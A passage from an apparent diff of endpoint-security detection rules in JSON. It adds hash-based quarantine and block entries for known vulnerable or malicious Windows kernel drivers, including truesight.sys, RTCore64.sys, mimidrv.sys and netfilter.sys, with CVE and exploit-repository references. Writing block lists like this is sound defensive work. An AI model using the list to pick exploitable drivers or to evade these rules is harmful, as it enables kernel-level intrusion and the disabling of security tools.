"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614283Z", + "creation_date": "2026-03-23T11:45:29.614285Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614290Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f39b84cb5132d4facff213c630b05ec97ef9d83b93579530152310d63945762", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5505f3cc-5c92-5aaa-b79e-a7f2753f3c3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483012Z", + "creation_date": "2026-03-23T11:45:31.483016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483025Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "032fbb9095a8449395e46ffba821eeebaed55a320785319125abccd9611904c8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55377e42-c20c-5085-8ed0-dfdf378e18ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618356Z", + "creation_date": "2026-03-23T11:45:29.618358Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618363Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f1fbec90c60ee4daba1b35932db9f3556633b2777b1039163841a91cf997938e", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5539433b-070f-5d36-8dc4-cdbf454284ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828293Z", + "creation_date": "2026-03-23T11:45:30.828295Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8cd9ba40871830debe83d134d38cb5a287d59eede0a01eca839f55cf10c558e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "555a0a48-b893-5930-b21a-d41fb24f2639", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477484Z", + "creation_date": "2026-03-23T11:45:31.477488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0ffd4812b2a3634efb630521b4c94c643d100e929d5c5e163314a18fb9561bd7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5564e6bc-0a83-5089-ba3e-a77e6f605048", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491547Z", + "creation_date": "2026-03-23T11:45:31.491550Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491558Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c60b91241bb1de59b66dea8da67e28acda648876e8fcae986943fd063ce0c57b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "556bde27-78ae-5335-a0e0-7816eb7b044f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967548Z", + "creation_date": "2026-03-23T11:45:29.967550Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967556Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0afb8b937a5907fbe55a1d1cc7574e9304007ef33fa80ff3896e997a1beaf37", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55791f08-d072-5bbb-825a-89f2f56d19b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621158Z", + "creation_date": "2026-03-23T11:45:29.621160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621166Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac22a7cce3795e58c974056a86a06444e831d52185f9f37db88c65e14cd5bb75", + "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) 
[https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "557f98c7-d5b1-5880-a8cf-b249060f36ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818119Z", + "creation_date": "2026-03-23T11:45:30.818121Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818126Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d330ab003206ce5e9828607562790aa8dd0453f6b7452f5c6053e3c6b6761d25", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55974905-e240-5715-be13-75013c1fdd63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.158917Z", + "creation_date": "2026-03-23T11:45:31.158919Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.158924Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e4a40946e097a56b9dc105dc39add411e5ebd1a0593ba04fdfeffc07635f1e0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55983824-3dd7-58af-9712-8eeb85f43478", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829790Z", + "creation_date": "2026-03-23T11:45:30.829792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4f8c66b3d2ca6209e2195c8f87b6f5be13ec83e216bdbbda8c8dabe57de9e85", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "559f4539-0fec-57ad-b8ed-6089f78d7e7b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484616Z", + "creation_date": "2026-03-23T11:45:31.484623Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484635Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dcf4959a9c7da3ea2bee30db220fa32e2ba7dd15148aeea915ed7d0a190dd27d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55a99ee6-30fd-5760-81e2-3890d0471643", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479368Z", + "creation_date": "2026-03-23T11:45:30.479370Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.479375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d30c6c4fa0216d0637b4049142bc275814fd674859373bd4af520ce173a1c75", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55be148e-7e16-5877-85cd-5ac63aab047e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498173Z", + "creation_date": "2026-03-23T11:45:31.498176Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498184Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b116e94f25a40b4b11297df6d41f282b58ea0bd802eeee167df246105b523d69", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55c375cd-4c5a-5ad5-b059-1a1c06bb50e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822635Z", + "creation_date": "2026-03-23T11:45:31.822638Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822643Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce7560d16469ada1f2a95e0f1499b9f50dead6fa42048511fc921e6e22514b7f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55cd6dda-cef3-59a8-94ec-1dcc8670f171", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461012Z", + "creation_date": "2026-03-23T11:45:30.461016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461025Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d9a3dc47699949c8ec0c704346fb2ee86ff9010daa0dbac953cfa5f76b52fcd1", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55d91bfc-5e66-5bd2-9f26-c79ef2157673", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478221Z", + "creation_date": "2026-03-23T11:45:30.478224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478234Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a233680b53bcdfba264005644e51bfa4ba9923f0a3544ed4596e28fb9f3fd682", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55f35b79-b9c8-5c22-af5c-bd0a4d8b9eba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.610546Z", + "creation_date": "2026-03-23T11:45:29.610548Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80eeb8c2890f3535ed14f5881baf2f2226e6763be099d09fb8aadaba5b4474c1", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "55f7b8b5-e1ae-5374-b5b0-4c2e24790da8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469914Z", + "creation_date": "2026-03-23T11:45:30.469917Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469927Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6094d55d6c7b4fd45cd06658600cef49007bcb73d6a0ab62f6eeabaa19bfd333", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"56086a2b-a746-568b-9cb7-b6a0ca71a39a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143325Z", + "creation_date": "2026-03-23T11:45:31.143327Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc7ffe53ce3aacf3cd8b22428dfdf4eebc1ed108f9b99db01ca8fcee10357bbf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "560cd67c-5c1a-5df0-9734-4dce10ff6fe4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984390Z", + "creation_date": "2026-03-23T11:45:29.984392Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.984397Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8ded5e10dfc997482ba4377c60e7902e6f755674be51b0e181ae465529fb2f2", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56156324-c52d-56ab-97d2-b20b8c56bc6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459049Z", + "creation_date": "2026-03-23T11:45:30.459052Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "edc6e32e3545f859e5b49ece1cabd13623122c1f03a2f7454a61034b3ff577ed", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56222889-7449-57ff-8c3f-84a06c6d5b4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487667Z", + "creation_date": "2026-03-23T11:45:31.487668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487674Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19b104b64874cce9c1b72817b1d5c1d2835ab1d7e1edd7d48e2f7495dc276b3f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "56397402-72ad-59b1-9e41-ddb2500fd02e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823141Z", + "creation_date": "2026-03-23T11:45:30.823143Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823148Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"bfc2ef3b404294fe2fa05a8b71c7f786b58519175b7202a69fe30f45e607ff1c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller AntiMalware Driver (aka truesight.sys) [https://github.com/ph4nt0mbyt3/Darkside] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "563bd491-4695-50a1-ac7e-f8c8d38f7f74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980751Z", + "creation_date": "2026-03-23T11:45:29.980753Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980758Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 